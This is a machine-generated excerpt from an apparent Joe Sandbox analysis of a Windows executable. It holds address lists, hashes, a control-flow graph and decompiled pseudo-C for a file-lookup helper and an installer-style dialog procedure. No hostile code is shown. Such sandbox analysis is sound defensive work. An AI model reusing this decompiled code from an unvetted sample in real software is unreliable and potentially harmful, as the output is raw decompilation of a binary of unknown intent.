                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x00000000
                                                                                              0x004073c8
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00000000
                                                                                              0x0040753b
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                              • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                              • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                              • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                                                              0x004069a9
                                                                                              0x004069b2
                                                                                              0x00000000
                                                                                              0x004069bf
                                                                                              0x004069b5
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(74D0FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004069A9
                                                                                              • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                              • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                              • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                                                              C-Code - Quality: 84%
                                                                                              			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                                                              0x004040d0
                                                                                              0x004040d7
                                                                                              0x0040423e
                                                                                              0x00404242
                                                                                              0x00404246
                                                                                              0x00404248
                                                                                              0x0040424d
                                                                                              0x00404258
                                                                                              0x00404263
                                                                                              0x00404268
                                                                                              0x0040426a
                                                                                              0x0040426c
                                                                                              0x0040426f
                                                                                              0x00404274
                                                                                              0x00404282
                                                                                              0x0040428f
                                                                                              0x00404296
                                                                                              0x00404296
                                                                                              0x00404297
                                                                                              0x00404297
                                                                                              0x0040429c
                                                                                              0x004042a2
                                                                                              0x004042a9
                                                                                              0x004042af
                                                                                              0x004042b1
                                                                                              0x004042f1
                                                                                              0x004042f6
                                                                                              0x004042fb
                                                                                              0x004042fb
                                                                                              0x00404300
                                                                                              0x00404309
                                                                                              0x0040430b
                                                                                              0x00404310
                                                                                              0x00404316
                                                                                              0x0040431a
                                                                                              0x0040431a
                                                                                              0x0040431f
                                                                                              0x00404325
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404330
                                                                                              0x00404336
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040433f
                                                                                              0x00404347
                                                                                              0x0040434c
                                                                                              0x0040434f
                                                                                              0x00404355
                                                                                              0x0040435a
                                                                                              0x0040435d
                                                                                              0x00404363
                                                                                              0x00404368
                                                                                              0x0040436b
                                                                                              0x00404371
